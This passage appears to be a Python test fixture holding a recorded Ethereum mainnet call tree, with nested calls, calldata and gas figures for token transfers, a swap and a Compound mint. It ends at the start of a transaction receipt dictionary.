"call_type": CallType.DELEGATECALL,
"address": HexBytes(
"0x976aa93ca5aaa569109f4267589c619a097f001d"
),
"value": 0,
"depth": 0,
"gas_limit": 712609,
"gas_cost": 4248,
"calldata": HexBytes(
"0x95dd9193000000000000000000000000f14f0648435cf34f8bc800d4e71ff0ba15bc52dd"
),
"returndata": HexBytes(
"0x00000000000000000000000000000000000000000000000000000026cf3ea6a1"
),
"calls": [],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
}
],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
}
],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
{
"call_type": CallType.STATICCALL,
"address": HexBytes(
"0xc00e94cb662c3520282e6f5717214004a7f26888"
),
"value": 0,
"depth": 0,
"gas_limit": 726999,
"gas_cost": 1488,
"calldata": HexBytes(
"0x70a082310000000000000000000000003d9819210a31b4961b30ef54be2aed79b9c9cd3b"
),
"returndata": HexBytes(
"0x000000000000000000000000000000000000000000000801eaf5e13a6e0f06f7"
),
"calls": [],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
{
"call_type": CallType.CALL,
"address": HexBytes(
"0xc00e94cb662c3520282e6f5717214004a7f26888"
),
"value": 0,
"depth": 0,
"gas_limit": 723862,
"gas_cost": 19090,
"calldata": HexBytes(
"0xa9059cbb000000000000000000000000f14f0648435cf34f8bc800d4e71ff0ba15bc52dd000000000000000000000000000000000000000000000000064fdb83b0307d50"
),
"returndata": HexBytes(
"0x0000000000000000000000000000000000000000000000000000000000000001"
),
"calls": [],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
}
],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
{
"call_type": CallType.STATICCALL,
"address": HexBytes(
"0xdac17f958d2ee523a2206206994597c13d831ec7"
),
"value": 0,
"depth": 0,
"gas_limit": 726950,
"gas_cost": 2431,
"calldata": HexBytes(
"0x70a08231000000000000000000000000f650c3d88d12db855b8bf7d11be6c55a4e07dcc9"
),
"returndata": HexBytes(
"0x0000000000000000000000000000000000000000000000000000088ee804439c"
),
"calls": [],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
{
"call_type": CallType.CALL,
"address": HexBytes(
"0xdac17f958d2ee523a2206206994597c13d831ec7"
),
"value": 0,
"depth": 0,
"gas_limit": 716812,
"gas_cost": 34601,
"calldata": HexBytes(
"0xa9059cbb000000000000000000000000f14f0648435cf34f8bc800d4e71ff0ba15bc52dd000000000000000000000000000000000000000000000000000000051f4d5c00"
),
"returndata": HexBytes("0x"),
"calls": [],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
{
"call_type": CallType.CALL,
"address": HexBytes(
"0x3d9819210a31b4961b30ef54be2aed79b9c9cd3b"
),
"value": 0,
"depth": 0,
"gas_limit": 666827,
"gas_cost": 2261,
"calldata": HexBytes(
"0x5c778605000000000000000000000000f650c3d88d12db855b8bf7d11be6c55a4e07dcc9000000000000000000000000f14f0648435cf34f8bc800d4e71ff0ba15bc52dd000000000000000000000000000000000000000000000000000000051f4d5c00"
),
"returndata": HexBytes("0x"),
"calls": [
{
"call_type": CallType.DELEGATECALL,
"address": HexBytes(
"0x7b5e3521a049c8ff88e6349f33044c6cc33c113c"
),
"value": 0,
"depth": 0,
"gas_limit": 654627,
"gas_cost": 354,
"calldata": HexBytes(
"0x5c778605000000000000000000000000f650c3d88d12db855b8bf7d11be6c55a4e07dcc9000000000000000000000000f14f0648435cf34f8bc800d4e71ff0ba15bc52dd000000000000000000000000000000000000000000000000000000051f4d5c00"
),
"returndata": HexBytes("0x"),
"calls": [],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
}
],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
}
],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
{
"call_type": CallType.CALL,
"address": HexBytes("0xf650c3d88d12db855b8bf7d11be6c55a4e07dcc9"),
"value": 0,
"depth": 0,
"gas_limit": 690550,
"gas_cost": 1148,
"calldata": HexBytes("0x6f307dc3"),
"returndata": HexBytes(
"0x000000000000000000000000dac17f958d2ee523a2206206994597c13d831ec7"
),
"calls": [],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
{
"call_type": CallType.STATICCALL,
"address": HexBytes("0x637726f8b08a7abe3ae3acab01a80e2d8ddef77b"),
"value": 0,
"depth": 0,
"gas_limit": 687473,
"gas_cost": 1136,
"calldata": HexBytes(
"0x41d6e7da0000000000000000000000005668ead1edb8e2a4d724c8fb9cb5ffeabeb422dc"
),
"returndata": HexBytes(
"0x0000000000000000000000000000000000000000000000000000000000000000"
),
"calls": [],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
{
"call_type": CallType.CALL,
"address": HexBytes("0xf650c3d88d12db855b8bf7d11be6c55a4e07dcc9"),
"value": 0,
"depth": 0,
"gas_limit": 684589,
"gas_cost": 1148,
"calldata": HexBytes("0x6f307dc3"),
"returndata": HexBytes(
"0x000000000000000000000000dac17f958d2ee523a2206206994597c13d831ec7"
),
"calls": [],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
{
"call_type": CallType.STATICCALL,
"address": HexBytes("0x1b14e8d511c9a4395425314f849bd737baf8208f"),
"value": 0,
"depth": 0,
"gas_limit": 681635,
"gas_cost": 1299,
"calldata": HexBytes(
"0xb371deac0000000000000000000000005668ead1edb8e2a4d724c8fb9cb5ffeabeb422dc"
),
"returndata": HexBytes(
"0x0000000000000000000000000000000000000000000000000000000000000000"
),
"calls": [],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
{
"call_type": CallType.CALL,
"address": HexBytes("0xdac17f958d2ee523a2206206994597c13d831ec7"),
"value": 0,
"depth": 0,
"gas_limit": 677584,
"gas_cost": 15401,
"calldata": HexBytes(
"0xa9059cbb000000000000000000000000322d58b9e75a6918f7e7849aee0ff09369977e080000000000000000000000000000000000000000000000000000000003473bc0"
),
"returndata": HexBytes("0x"),
"calls": [],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
{
"call_type": CallType.CALL,
"address": HexBytes("0xdac17f958d2ee523a2206206994597c13d831ec7"),
"value": 0,
"depth": 0,
"gas_limit": 659519,
"gas_cost": 4160,
"calldata": HexBytes(
"0x095ea7b300000000000000000000000095e6f48254609a6ee006f7d493c8e5fb97094cef0000000000000000000000000000000000000000000000000000000000000000"
),
"returndata": HexBytes("0x"),
"calls": [],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
{
"call_type": CallType.CALL,
"address": HexBytes("0xdac17f958d2ee523a2206206994597c13d831ec7"),
"value": 0,
"depth": 0,
"gas_limit": 652917,
"gas_cost": 24353,
"calldata": HexBytes(
"0x095ea7b300000000000000000000000095e6f48254609a6ee006f7d493c8e5fb97094cef000000000000000000000000000000000000000000000000000000051c062040"
),
"returndata": HexBytes("0x"),
"calls": [],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
{
"call_type": CallType.STATICCALL,
"address": HexBytes("0x4ba1f38427b33b8ab7bb0490200dae1f1c36823f"),
"value": 0,
"depth": 0,
"gas_limit": 626856,
"gas_cost": 1155,
"calldata": HexBytes(
"0x00c045f000000000000000000000000061935cbdd02287b511119ddb11aeb42f1593b7ef"
),
"returndata": HexBytes(
"0x0000000000000000000000000000000000000000000000000000000000000000"
),
"calls": [],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
{
"call_type": CallType.STATICCALL,
"address": HexBytes("0x4ba1f38427b33b8ab7bb0490200dae1f1c36823f"),
"value": 0,
"depth": 0,
"gas_limit": 623811,
"gas_cost": 1177,
"calldata": HexBytes(
"0x05eb98f200000000000000000000000061935cbdd02287b511119ddb11aeb42f1593b7ef"
),
"returndata": HexBytes(
"0x0000000000000000000000000000000000000000000000000000000000000001"
),
"calls": [],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
{
"call_type": CallType.CALL,
"address": HexBytes("0x61935cbdd02287b511119ddb11aeb42f1593b7ef"),
"value": 20160000000000000,
"depth": 0,
"gas_limit": 609943,
"gas_cost": 172105,
"calldata": HexBytes(
"0xa6c3bf330000000000000000000000000000000000000000000000000000000000000060000000000000000000000000000000000000000000000000000000051c062040000000000000000000000000000000000000000000000000000000000000078000000000000000000000000000000000000000000000000000000000000000020000000000000000000000000000000000000000000000000000000000000040000000000000000000000000000000000000000000000000000000000000026000000000000000000000000057845987c8c859d52931ee248d8d84ab10532407000000000000000000000000f14f0648435cf34f8bc800d4e71ff0ba15bc52dd000000000000000000000000100000000000000000000000000000000000001100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000026ac56ad607a6a00000000000000000000000000000000000000000000000000000000005209d0d7f00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000005fb4acca00000000000000000000000000000000000000000000000000000175d9c171a700000000000000000000000000000000000000000000000000000000000001c0000000000000000000000000000000000000000000000000000000000000064000000000000000000000000000000000000000000000000000000000000006a000000000000000000000000000000000000000000000000000000000000006a00000000000000000000000000000000000000000000000000000000000000024f47261b0000000000000000000000000c02aaa39b223fe8d0a0e5c4f27ead9083c756cc200000000000000000000000000000000000000000000000000000000000000000000000000000000c47b7094f378e54347e281aab170e8cca69d880a000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002640810b1f010301d000000000000000000000000000000000000000000000000000000051f4d5c0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000005fb4c8876573a792d8faba391a985b937c96dfe336f8022285a4e5d5fa2b07c3eef9834600000000000000000000000000000000000000000000000000000000000001c00000000000000000000000000000000000000000000000000000000000000420000000000000000000000000000000000000000000000000000000000000048000000000000000000000000000000000000000000000000000000000000004800000000000000000000000000000000000000000000000000000000000000224dc1600f3000000000000000000000000c02aaa39b223fe8d0a0e5c4f27ead9083c756cc2000000000000000000000000c47b7094f378e54347e281aab170e8cca69d880a000000000000000000000000000000000000000000000000000000000000006000000000000000000000000000000000000000000000000000000000000001a0000000000000000000000000dac17f958d2ee523a2206206994597c13d831ec7000000000000000000000000000000000000000000000000000000000000004000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000020000000000000000000000000dcd6011f4c6b80e470d9487f5871a0cba7c93f48000000000000000000000000000000000000000000000000000000051f4d5c00000000000000000000000000000000000000000000000002640810b1f010301d0000000000000000000000000000000000000000000000000000000000000080000000000000000000000000000000000000000000000000000000000000008000000000000000000000000000000000000000000000000000000000000000200000000000000000000000000000000000000000000000000000000000000002000000000000000000000000dac17f958d2ee523a2206206994597c13d831ec7000000000000000000000000c02aaa39b223fe8d0a0e5c4f27ead9083c756cc2000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000024f47261b0000000000000000000000000dac17f958d2ee523a2206206994597c13d831ec70000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000000000000000000000000000000000000000000000000000000000004000000000000000000000000000000000000000000000000000000000000000c000000000000000000000000000000000000000000000000000000000000000421ca1a7c12b193b68e6ac3d4269b9c1fd75051a012db63ecd99d217f7b8bc95badb74a1c07e0046c5f98f8b3acf1f745d1cc0b8950ec852ba929ca1479c6e025ff10300000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010400000000000000000000000000000000000000000000000000000000000000869584cd000000000000000000000000322d58b9e75a6918f7e7849aee0ff09369977e0800000000000000000000000000000000000000000000003cf9caf5925fb4ac67"
),
"returndata": HexBytes(
"0x000000000000000000000000000000000000000000000002689b8d5f98f1cbc8000000000000000000000000000000000000000000000000000000051c062040000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000017a023c7c1a000"
),
"calls": [
{
"call_type": CallType.DELEGATECALL,
"address": HexBytes("0x61935cbdd02287b511119ddb11aeb42f1593b7ef"),
"value": 20160000000000000,
"depth": 0,
"gas_limit": 580925,
"gas_cost": 140727,
"calldata": HexBytes(
"0x9b44d5560000000000000000000000000000000000000000000000000000000000000060000000000000000000000000000000000000000000000000000000051c062040000000000000000000000000000000000000000000000000000000000000032000000000000000000000000057845987c8c859d52931ee248d8d84ab10532407000000000000000000000000f14f0648435cf34f8bc800d4e71ff0ba15bc52dd000000000000000000000000100000000000000000000000000000000000001100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000026ac56ad607a6a00000000000000000000000000000000000000000000000000000000005209d0d7f00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000005fb4acca00000000000000000000000000000000000000000000000000000175d9c171a700000000000000000000000000000000000000000000000000000000000001c00000000000000000000000000000000000000000000000000000000000000220000000000000000000000000000000000000000000000000000000000000028000000000000000000000000000000000000000000000000000000000000002a00000000000000000000000000000000000000000000000000000000000000024f47261b0000000000000000000000000c02aaa39b223fe8d0a0e5c4f27ead9083c756cc2000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000024f47261b0000000000000000000000000dac17f958d2ee523a2206206994597c13d831ec7000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000421ca1a7c12b193b68e6ac3d4269b9c1fd75051a012db63ecd99d217f7b8bc95badb74a1c07e0046c5f98f8b3acf1f745d1cc0b8950ec852ba929ca1479c6e025ff103000000000000000000000000000000000000000000000000000000000000"
),
"returndata": HexBytes(
"0x000000000000000000000000000000000000000000000002689b8d5f98f1cbc8000000000000000000000000000000000000000000000000000000051c062040000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000017a023c7c1a000"
),
"calls": [
{
"call_type": CallType.CALL,
"address": HexBytes(
"0x95e6f48254609a6ee006f7d493c8e5fb97094cef"
),
"value": 0,
"depth": 0,
"gas_limit": 520830,
"gas_cost": 19278,
"calldata": HexBytes(
"0xa85e59e40000000000000000000000000000000000000000000000000000000000000080000000000000000000000000f14f0648435cf34f8bc800d4e71ff0ba15bc52dd00000000000000000000000057845987c8c859d52931ee248d8d84ab10532407000000000000000000000000000000000000000000000000000000051c0620400000000000000000000000000000000000000000000000000000000000000024f47261b0000000000000000000000000dac17f958d2ee523a2206206994597c13d831ec700000000000000000000000000000000000000000000000000000000"
),
"returndata": HexBytes("0x"),
"calls": [
{
"call_type": CallType.CALL,
"address": HexBytes(
"0xdac17f958d2ee523a2206206994597c13d831ec7"
),
"value": 0,
"depth": 0,
"gas_limit": 510731,
"gas_cost": 17224,
"calldata": HexBytes(
"0x23b872dd000000000000000000000000f14f0648435cf34f8bc800d4e71ff0ba15bc52dd00000000000000000000000057845987c8c859d52931ee248d8d84ab10532407000000000000000000000000000000000000000000000000000000051c062040"
),
"returndata": HexBytes("0x"),
"calls": [],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
}
],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
{
"call_type": CallType.CALL,
"address": HexBytes(
"0x95e6f48254609a6ee006f7d493c8e5fb97094cef"
),
"value": 0,
"depth": 0,
"gas_limit": 498588,
"gas_cost": 33079,
"calldata": HexBytes(
"0xa85e59e4000000000000000000000000000000000000000000000000000000000000008000000000000000000000000057845987c8c859d52931ee248d8d84ab10532407000000000000000000000000f14f0648435cf34f8bc800d4e71ff0ba15bc52dd000000000000000000000000000000000000000000000002689b8d5f98f1cbc80000000000000000000000000000000000000000000000000000000000000024f47261b0000000000000000000000000c02aaa39b223fe8d0a0e5c4f27ead9083c756cc200000000000000000000000000000000000000000000000000000000"
),
"returndata": HexBytes("0x"),
"calls": [
{
"call_type": CallType.CALL,
"address": HexBytes(
"0xc02aaa39b223fe8d0a0e5c4f27ead9083c756cc2"
),
"value": 0,
"depth": 0,
"gas_limit": 488836,
"gas_cost": 31025,
"calldata": HexBytes(
"0x23b872dd00000000000000000000000057845987c8c859d52931ee248d8d84ab10532407000000000000000000000000f14f0648435cf34f8bc800d4e71ff0ba15bc52dd000000000000000000000000000000000000000000000002689b8d5f98f1cbc8"
),
"returndata": HexBytes(
"0x0000000000000000000000000000000000000000000000000000000000000001"
),
"calls": [],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
}
],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
{
"call_type": CallType.CALL,
"address": HexBytes(
"0xa26e80e7dea86279c6d778d702cc413e6cffa777"
),
"value": 6650000000000000,
"depth": 0,
"gas_limit": 456135,
"gas_cost": 20145,
"calldata": HexBytes(
"0xa3b4a32700000000000000000000000057845987c8c859d52931ee248d8d84ab10532407000000000000000000000000f14f0648435cf34f8bc800d4e71ff0ba15bc52dd0000000000000000000000000000000000000000000000000017a023c7c1a000"
),
"returndata": HexBytes("0x"),
"calls": [
{
"call_type": CallType.DELEGATECALL,
"address": HexBytes(
"0x2a17c35ff147b32f13f19f2e311446eeb02503f3"
),
"value": 6650000000000000,
"depth": 0,
"gas_limit": 447162,
"gas_cost": 18173,
"calldata": HexBytes(
"0xa3b4a32700000000000000000000000057845987c8c859d52931ee248d8d84ab10532407000000000000000000000000f14f0648435cf34f8bc800d4e71ff0ba15bc52dd0000000000000000000000000000000000000000000000000017a023c7c1a000"
),
"returndata": HexBytes("0x"),
"calls": [],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
}
],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
{
"call_type": CallType.CALL,
"address": HexBytes("0xf14f0648435cf34f8bc800d4e71ff0ba15bc52dd"),
"value": 13510000000000000,
"depth": 0,
"gas_limit": 2300,
"gas_cost": 40,
"calldata": HexBytes("0x"),
"returndata": HexBytes("0x"),
"calls": [],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
{
"call_type": CallType.STATICCALL,
"address": HexBytes("0xdac17f958d2ee523a2206206994597c13d831ec7"),
"value": 0,
"depth": 0,
"gas_limit": 438641,
"gas_cost": 2431,
"calldata": HexBytes(
"0x70a08231000000000000000000000000f14f0648435cf34f8bc800d4e71ff0ba15bc52dd"
),
"returndata": HexBytes(
"0x0000000000000000000000000000000000000000000000000000000000000000"
),
"calls": [],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
{
"call_type": CallType.CALL,
"address": HexBytes("0xc02aaa39b223fe8d0a0e5c4f27ead9083c756cc2"),
"value": 0,
"depth": 0,
"gas_limit": 434422,
"gas_cost": 1234,
"calldata": HexBytes(
"0x70a08231000000000000000000000000f14f0648435cf34f8bc800d4e71ff0ba15bc52dd"
),
"returndata": HexBytes(
"0x000000000000000000000000000000000000000000000002689b8d5f98f1cbc8"
),
"calls": [],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
{
"call_type": CallType.CALL,
"address": HexBytes("0xc02aaa39b223fe8d0a0e5c4f27ead9083c756cc2"),
"value": 0,
"depth": 0,
"gas_limit": 431535,
"gas_cost": 11880,
"calldata": HexBytes(
"0x2e1a7d4d000000000000000000000000000000000000000000000002689b8d5f98f1cbc8"
),
"returndata": HexBytes("0x"),
"calls": [
{
"call_type": CallType.CALL,
"address": HexBytes("0xf14f0648435cf34f8bc800d4e71ff0ba15bc52dd"),
"value": 44431261990481152968,
"depth": 0,
"gas_limit": 2300,
"gas_cost": 40,
"calldata": HexBytes("0x"),
"returndata": HexBytes("0x"),
"calls": [],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
}
],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
{
"call_type": CallType.STATICCALL,
"address": HexBytes("0xc02aaa39b223fe8d0a0e5c4f27ead9083c756cc2"),
"value": 0,
"depth": 0,
"gas_limit": 417416,
"gas_cost": 1234,
"calldata": HexBytes(
"0x70a08231000000000000000000000000f14f0648435cf34f8bc800d4e71ff0ba15bc52dd"
),
"returndata": HexBytes(
"0x0000000000000000000000000000000000000000000000000000000000000000"
),
"calls": [],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
{
"call_type": CallType.CALL,
"address": HexBytes("0x4ddc2d193948926d02f9b1fe9e1daa0718270ed5"),
"value": 44424611990481152968,
"depth": 0,
"gas_limit": 407692,
"gas_cost": 128739,
"calldata": HexBytes("0x1249c58b"),
"returndata": HexBytes("0x"),
"calls": [
{
"call_type": CallType.STATICCALL,
"address": HexBytes("0x0c3f8df27e1a00b47653fde878d68d35f00714c0"),
"value": 0,
"depth": 0,
"gas_limit": 390245,
"gas_cost": 5403,
"calldata": HexBytes(
"0x15f2405300000000000000000000000000000000000000000000f72efd2fcf61f1e648e2000000000000000000000000000000000000000000000ad7de536f7483842c960000000000000000000000000000000000000000000000055109b1b33888dede"
),
"returndata": HexBytes(
"0x000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002ae27d696"
),
"calls": [],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
{
"call_type": CallType.CALL,
"address": HexBytes("0x3d9819210a31b4961b30ef54be2aed79b9c9cd3b"),
"value": 0,
"depth": 0,
"gas_limit": 351788,
"gas_cost": 48350,
"calldata": HexBytes(
"0x4ef4c3e10000000000000000000000004ddc2d193948926d02f9b1fe9e1daa0718270ed5000000000000000000000000f14f0648435cf34f8bc800d4e71ff0ba15bc52dd0000000000000000000000000000000000000000000000026883ed3bd1302bc8"
),
"returndata": HexBytes(
"0x0000000000000000000000000000000000000000000000000000000000000000"
),
"calls": [
{
"call_type": CallType.DELEGATECALL,
"address": HexBytes(
"0x7b5e3521a049c8ff88e6349f33044c6cc33c113c"
),
"value": 0,
"depth": 0,
"gas_limit": 344510,
"gas_cost": 46370,
"calldata": HexBytes(
"0x4ef4c3e10000000000000000000000004ddc2d193948926d02f9b1fe9e1daa0718270ed5000000000000000000000000f14f0648435cf34f8bc800d4e71ff0ba15bc52dd0000000000000000000000000000000000000000000000026883ed3bd1302bc8"
),
"returndata": HexBytes(
"0x0000000000000000000000000000000000000000000000000000000000000000"
),
"calls": [
{
"call_type": CallType.STATICCALL,
"address": HexBytes(
"0x4ddc2d193948926d02f9b1fe9e1daa0718270ed5"
),
"value": 0,
"depth": 0,
"gas_limit": 333450,
"gas_cost": 1044,
"calldata": HexBytes("0x18160ddd"),
"returndata": HexBytes(
"0x00000000000000000000000000000000000000000000000000159c9f6f40704a"
),
"calls": [],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
{
"call_type": CallType.STATICCALL,
"address": HexBytes(
"0x4ddc2d193948926d02f9b1fe9e1daa0718270ed5"
),
"value": 0,
"depth": 0,
"gas_limit": 314737,
"gas_cost": 1253,
"calldata": HexBytes(
"0x70a08231000000000000000000000000f14f0648435cf34f8bc800d4e71ff0ba15bc52dd"
),
"returndata": HexBytes(
"0x000000000000000000000000000000000000000000000000000003437612e40a"
),
"calls": [],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
{
"call_type": CallType.STATICCALL,
"address": HexBytes(
"0xc00e94cb662c3520282e6f5717214004a7f26888"
),
"value": 0,
"depth": 0,
"gas_limit": 310323,
"gas_cost": 1488,
"calldata": HexBytes(
"0x70a082310000000000000000000000003d9819210a31b4961b30ef54be2aed79b9c9cd3b"
),
"returndata": HexBytes(
"0x000000000000000000000000000000000000000000000801e4a605b6bdde89a7"
),
"calls": [],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
{
"call_type": CallType.CALL,
"address": HexBytes(
"0xc00e94cb662c3520282e6f5717214004a7f26888"
),
"value": 0,
"depth": 0,
"gas_limit": 307187,
"gas_cost": 10690,
"calldata": HexBytes(
"0xa9059cbb000000000000000000000000f14f0648435cf34f8bc800d4e71ff0ba15bc52dd000000000000000000000000000000000000000000000000008bd386c2ed4798"
),
"returndata": HexBytes(
"0x0000000000000000000000000000000000000000000000000000000000000001"
),
"calls": [],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
}
],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
{
"call_type": CallType.CALL,
"address": HexBytes("0x3d9819210a31b4961b30ef54be2aed79b9c9cd3b"),
"value": 0,
"depth": 0,
"gas_limit": 277911,
"gas_cost": 2316,
"calldata": HexBytes(
"0x41c728b90000000000000000000000004ddc2d193948926d02f9b1fe9e1daa0718270ed5000000000000000000000000f14f0648435cf34f8bc800d4e71ff0ba15bc52dd0000000000000000000000000000000000000000000000026883ed3bd1302bc800000000000000000000000000000000000000000000000000000033a46a6672"
),
"returndata": HexBytes("0x"),
"calls": [
{
"call_type": CallType.DELEGATECALL,
"address": HexBytes(
"0x7b5e3521a049c8ff88e6349f33044c6cc33c113c"
),
"value": 0,
"depth": 0,
"gas_limit": 271782,
"gas_cost": 403,
"calldata": HexBytes(
"0x41c728b90000000000000000000000004ddc2d193948926d02f9b1fe9e1daa0718270ed5000000000000000000000000f14f0648435cf34f8bc800d4e71ff0ba15bc52dd0000000000000000000000000000000000000000000000026883ed3bd1302bc800000000000000000000000000000000000000000000000000000033a46a6672"
),
"returndata": HexBytes("0x"),
"calls": [],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
}
],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
{
"call_type": CallType.CALL,
"address": HexBytes("0x5668ead1edb8e2a4d724c8fb9cb5ffeabeb422dc"),
"value": 20160000000000000,
"depth": 0,
"gas_limit": 2300,
"gas_cost": 0,
"calldata": HexBytes("0x"),
"returndata": HexBytes("0x"),
"calls": [],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
{
"call_type": CallType.CALL,
"address": HexBytes("0x5c55b921f590a89c1ebe84df170e655a82b62126"),
"value": 0,
"depth": 0,
"gas_limit": 271185,
"gas_cost": 5060,
"calldata": HexBytes(
"0xd061ce50000000000000000000000000f14f0648435cf34f8bc800d4e71ff0ba15bc52dd0000000000000000000000005668ead1edb8e2a4d724c8fb9cb5ffeabeb422dc000000000000000000000000000000000000000000000000000000000000008000000000000000000000000000000000000000000000000000000000000000c0000000000000000000000000000000000000000000000000000000000000000d436f6d706f756e64426f6f7374000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000080000000000000000000000000000000000000000000000000000000051c0620400000000000000000000000000000000000000000000000026883ed3bd1302bc8000000000000000000000000eeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee000000000000000000000000dac17f958d2ee523a2206206994597c13d831ec7"
),
"returndata": HexBytes("0x"),
"calls": [],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
},
],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
}
],
"selfdestruct": False,
"failed": False,
"display_cls": DisplayableCallTreeNode,
}
MAINNET_RECEIPT_DICT = local_receipt_data = {
"block_number": 11279968,
"data": b"\x1c\xffy\xcd\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00S<\x88D\xba\x19\"\xb8\x8d\x89*\xca\t\r\xf0\xcc\x0c)/\x1b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\n\xc4\xf7\x08\x84{\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00M\xdc-\x199H\x92m\x02\xf9\xb1\xfe\x9e\x1d\xaa\x07\x18'\x0e\xd5\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf6P\xc3\xd8\x8d\x12\xdb\x85[\x8b\xf7\xd1\x1b\xe6\xc5ZN\x07\xdc\xc9\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xda\xc1\x7f\x95\x8d.\xe5#\xa2 